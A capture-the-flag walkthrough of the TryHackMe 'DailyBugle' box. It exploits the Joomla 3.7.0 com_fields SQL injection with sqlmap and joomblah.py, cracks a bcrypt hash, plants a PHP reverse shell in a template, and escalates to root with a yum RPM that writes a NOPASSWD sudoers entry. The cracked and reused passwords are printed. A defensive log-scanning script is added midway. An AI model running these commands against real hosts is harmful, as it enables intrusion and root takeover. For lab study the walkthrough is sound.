DailyBugle is a CTF Linux box rated “hard” in difficulty on the TryHackMe platform. The machine covers a Joomla 3.7.0 SQL injection vulnerability and privilege escalation through a sudo entry for yum.
Network Scanning
nmap -sC -Pn -T4 10.10.10.230 -oN nmap_result.txt
Enumeration
We identified a robots.txt file that lists an administrator directory.
Opening this directory showed that an instance of Joomla was running on the website.
Joomla is a free and open-source content management system (CMS) used to build websites and online applications. Next we scan the Joomla installation with joomscan to find its version and other details.
joomscan -u http://10.10.10.230
We then looked for public exploits for this installed version using searchsploit and found that version 3.7.0 is vulnerable to SQL injection through the com_fields component's list[fullordering] parameter.
searchsploit joomla 3.7.0
searchsploit -m 42033
Exploitation
As exploit 42033 describes, this SQL injection vulnerability can be exploited with the following sqlmap command:
sqlmap -u "http://10.10.10.230/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --batch
However, this scan was taking far too long, so we looked for an alternative and found a script called “Joomblah.py”, a proof of concept for this SQLi vulnerability in Joomla 3.7.0. We downloaded the script, ran it, and obtained credentials.
wget https://raw.githubusercontent.com/XiphosResearch/exploits/master/Joomblah/joomblah.py
python2.7 joomblah.py http://10.10.10.230
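The injection above rides on a single query parameter, which makes it easy to spot in web server logs. The following Python script is an added defensive example, not part of the original writeup: it scans constructed Apache-style access log lines and flags com_fields requests whose list[fullordering] value is not a plain "column ASC|DESC" ordering or contains a SQL function name. The log format, the sample IPs and the legitimate-ordering heuristic are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumed combined log format: client, timestamp, "METHOD PATH PROTO", status, bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# A legitimate Joomla list[fullordering] value looks like "a.ordering ASC"; anything else is suspect.
LEGIT_ORDERING = re.compile(r'^[a-z_.]+ (asc|desc)$', re.IGNORECASE)
# SQL function/keyword names that never belong in an ordering parameter.
SQL_FUNCS = re.compile(r'\b(updatexml|extractvalue|sleep|benchmark|concat|union|select)\b', re.IGNORECASE)

# Constructed sample log lines (IPs from documentation ranges); the third and fourth mimic the attack.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2021:12:00:01 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5123',
    '203.0.113.5 - - [10/Mar/2021:12:00:02 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=a.ordering%20ASC HTTP/1.1" 200 3310',
    '198.51.100.7 - - [10/Mar/2021:12:00:03 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml HTTP/1.1" 500 642',
    '198.51.100.7 - - [10/Mar/2021:12:00:04 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=extractvalue HTTP/1.1" 500 640',
]


def flag_com_fields_sqli(lines):
    """Return (client_ip, timestamp, ordering_value) for each request matching the injection pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than crash on junk
        query = parse_qs(urlsplit(m['path']).query, keep_blank_values=True)
        if query.get('option') != ['com_fields']:
            continue  # only the com_fields component carries the vulnerable parameter
        # parse_qs already decodes the key, so list%5Bfullordering%5D and list[fullordering] both land here
        for value in query.get('list[fullordering]', []):
            value = unquote(value)  # catch double-encoded payloads
            if SQL_FUNCS.search(value) or not LEGIT_ORDERING.match(value):
                hits.append((m['ip'], m['ts'], value))
    return hits


if __name__ == "__main__":
    for ip, ts, value in flag_com_fields_sqli(SAMPLE_LOG):
        print(f"{ts} {ip} suspicious list[fullordering]={value!r}")
```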
Next we need to identify the hash type. Running the hash through hashid confirms that it is a bcrypt hash.
We saved the hash to a file and cracked it with John the Ripper; the recovered password is spiderman123.
echo '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm' > hash.txt
john --format=bcrypt hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
With clear-text credentials in hand, we logged in to the admin panel and reached the dashboard.
Like any other CMS, Joomla has templates that run as PHP, so we pasted the php-reverse-shell.php code into a template file and clicked on template preview. Before launching the preview we set up a netcat listener:
nc -lnvp 4444
A shell popped up on our listener.
Privilege Escalation
Now that we had a working shell on the victim box, we started looking for ways to escalate privileges. We checked the sudoers entries for our user but found nothing.
After a quick look around the system and the website's files, we found a configuration file containing database credentials: the database root user had the password nv5uz9r3ZEDzVjNu.
cd /var/www/html
cat configuration.php
We then tried logging in as another existing user, jjameson, with this password, and it worked. We immediately spawned a stable TTY using Python. Checking the sudoers entries for this user, we found yum listed.
su jjameson
nv5uz9r3ZEDzVjNu
sudo -l
Following the GTFOBins entry for yum, we can escalate privileges by building a custom RPM package. For this we need rpm and fpm installed first. We then write a single command into a shell script: the echo command appends our user jjameson to the sudoers file so that any command can be run as root. This script is our payload, which we bundle into an RPM package with fpm and serve over HTTP.
apt install rpm
gem install fpm
echo 'echo "jjameson ALL=(root) NOPASSWD:ALL" >> /etc/sudoers' > my.sh
fpm -n root -s dir -t rpm -a all --before-install my.sh .
python3 -m http.server 80
All that is left is to download this package into the /tmp directory on the victim's box.
cd /tmp
wget http://10.17.11.201/root-1.0-1.noarch.rpm
We installed it with yum localinstall, which ran successfully. We then ran a bash shell through sudo and, as expected, jjameson was allowed to run it as root, so privileges were escalated. Finally, we read the root flag.
sudo yum localinstall -y root-1.0-1.noarch.rpm
sudo bash
cd /root
cat root.txt